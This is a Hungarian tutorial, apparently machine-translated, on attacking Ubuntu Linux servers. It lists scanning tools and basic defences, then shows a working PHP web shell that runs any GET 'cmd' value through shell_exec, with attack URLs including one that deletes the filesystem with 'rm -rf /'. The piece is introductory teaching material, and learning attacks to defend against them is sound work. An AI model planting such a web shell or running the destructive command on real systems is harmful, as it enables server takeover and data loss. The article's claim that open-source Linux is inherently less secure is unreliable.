Linux operációs rendszer feltörése: Hackelés ezzel Ubuntu (Parancsok bemutatója)
A Linux a legszélesebb körben használt szerver operációs rendszer, különösen a webszerverek számára. Nyílt forráskódú; ez azt jelenti, hogy bárki hozzáférhet a forráskódhoz. Ez kevésbé biztonságos a többi operációs rendszerhez képest, mivel a támadók a forráskód tanulmányozásával megtalálhatják a sebezhetőséget. Linux A for Hackers célja, hogy ezeket a biztonsági réseket kihasználva jogosulatlan hozzáférést szerezzen a rendszerhez.
Ebben a cikkben bemutatjuk, hogy mi is az a Linux, milyen biztonsági résekkel lehet feltörni Ubuntu és a bevezethető ellenintézkedéseket.
Gyors megjegyzés Linuxon
A Linux nyílt forráskódú operációs rendszer. Számos Linux-alapú operációs rendszer létezik, mint például a Redhat, Fedora és Ubuntu, stb. Más operációs rendszerekkel ellentétben a Linux kevésbé biztonságos, ha a biztonságról van szó. Ennek oka, hogy a forráskód szabadon elérhető, így könnyen tanulmányozható a sebezhetőségek feltárása és kihasználása más, nem nyílt forráskódú operációs rendszerekhez képest. A Linux szerverként, asztali számítógépként, táblagépként vagy mobileszközként használható operációs rendszerként.
A Linux-programok grafikus felhasználói felülettel vagy parancsokkal is működtethetők. A Linux parancsok a számára Kali Linux a hackelés hatékonyabb és hatékonyabb a grafikus felhasználói felület használatához képest. Emiatt segít megismerni a hackeléshez szükséges alapvető Linux-parancsokat.
Tekintse meg ezeket az oktatóanyagokat https://www.guru99.com/unix-linux-tutorial.html hogy miként kezdjünk hozzá Kali Linux hack.
Linux hackereszközök
- Nessus– ez az eszköz használható Ubuntu hack, scan konfigurációs beállítások, javítások, hálózatok stb https://www.tenable.com/products/nessus
- NMap. Ez az eszköz használható a kiszolgálón futó gazdagépek és az általuk használt szolgáltatások figyelésére. Portok keresésére is használható. Megtalálható a címen https://nmap.org/
- SÁRA – A SARA a Security Auditor's Research Assistant rövidítése. Ahogy a neve is sugallja, ez az eszköz használható a hálózatok ellenőrzésére olyan fenyegetések ellen, mint pl SQL Injection, XSS stb. címen található http://www-arc.com/sara/sara.html
A fenti lista nem teljes; képet ad a rendelkezésre álló eszközökről Ubuntu Linux rendszerek feltörése és feltörése.
Hogyan lehet megakadályozni a Linux feltörését
A Linux Hacking kihasználja az operációs rendszer biztonsági réseit. Egy szervezet a következő szabályzatot alkalmazhatja, hogy megvédje magát az ilyen támadásoktól.
- Javításkezelés– A javítások olyan hibákat javítanak ki, amelyeket a támadók kihasználva veszélyeztetik a rendszert. A megfelelő javításkezelési szabályzat biztosítja, hogy folyamatosan alkalmazza a megfelelő javításokat a rendszeren.
- Megfelelő operációs rendszer konfiguráció– más kihasználások kihasználják a szerver konfigurációjának gyengeségeit. Az inaktív felhasználóneveket és démonokat le kell tiltani. Az alapértelmezett beállításokat, például az alkalmazások általános jelszavait, az alapértelmezett felhasználóneveket és néhány portszámot módosítani kell.
- Intrusion Detection System– az ilyen eszközök segítségével észlelhető a rendszerhez való jogosulatlan hozzáférés. Egyes eszközök képesek észlelni és megakadályozni az ilyen támadásokat.
Hackelési tevékenység: Hack a Ubuntu Linux rendszer PHP-t használva
Ebben a gyakorlati forgatókönyvben megtanuljuk, hogyan kell feltörni Ubuntu és alapvető információkat adunk a használatáról PHP hogy kompromittálja a Linuxot. Nem fogunk egyetlen áldozatot sem célozni. Ha ki akarod próbálni, telepítheted a LAMPP-t a helyi gépedre.
A PHP két funkcióval rendelkezik, amelyek segítségével Linux hacker parancsokat hajthatunk végre. Exec() és shell_exec() függvényekkel rendelkezik. Az exec() függvény a parancs kimenetének utolsó sorát adja vissza, míg a shell_exec() a parancs teljes eredményét karakterláncként adja vissza.
Demonstrációs célból tegyük fel, hogy a támadókezelők feltöltik a következő fájlt egy webszerverre.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
ITT,
A fenti szkript a parancsot a cmd nevű GET változóból kapja. A parancs végrehajtása a shell_exec() segítségével történik, és az eredményeket a böngésző visszaadja.
A fenti kód kihasználható a következő URL használatával
http://localhost/cp/konsole.php?cmd=ls%20-l
ITT,
- "…konsole.php?cmd=ls%20-l"a cmd változóhoz az ls –l értéket rendeli.
A parancs be Ubuntu a szerver elleni hackelésért mint
shell_exec('ls -l') ;
A fenti kód webszerveren történő végrehajtása az alábbiakhoz hasonló eredményeket ad.
A fenti parancs egyszerűen megjeleníti az aktuális könyvtár fájljait és az engedélyeket
Tegyük fel, hogy a támadó kiadja a következő parancsot
rm -rf /
ITT,
- Az „rm” eltávolítja a fájlokat
- Az „rf” az rm parancsot rekurzív módban futtatja. Az összes mappa és fájl törlése
- A „/” utasítja a parancsot, hogy indítsa el a fájlok törlését a gyökérkönyvtárból
A támadási URL valahogy így nézne ki
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Összegzésként
- A Linux egy népszerű operációs rendszer szerverek, asztali számítógépek, táblagépek és mobileszközök számára.
- Linux nyílt forráskódú, és a forráskódot bárki beszerezheti. Ez megkönnyíti a sebezhetőségek észlelését. Ez az egyik legjobb operációs rendszer a hackerek számára.
- Alapvető és hálózati hackelési parancsok Ubuntu értékesek a Linux hackerek számára.
- A sebezhetőség olyan gyengeség, amelyet kihasználva kompromittálható egy rendszer.
- A megfelelő biztonság segíthet megvédeni a rendszert a támadóktól.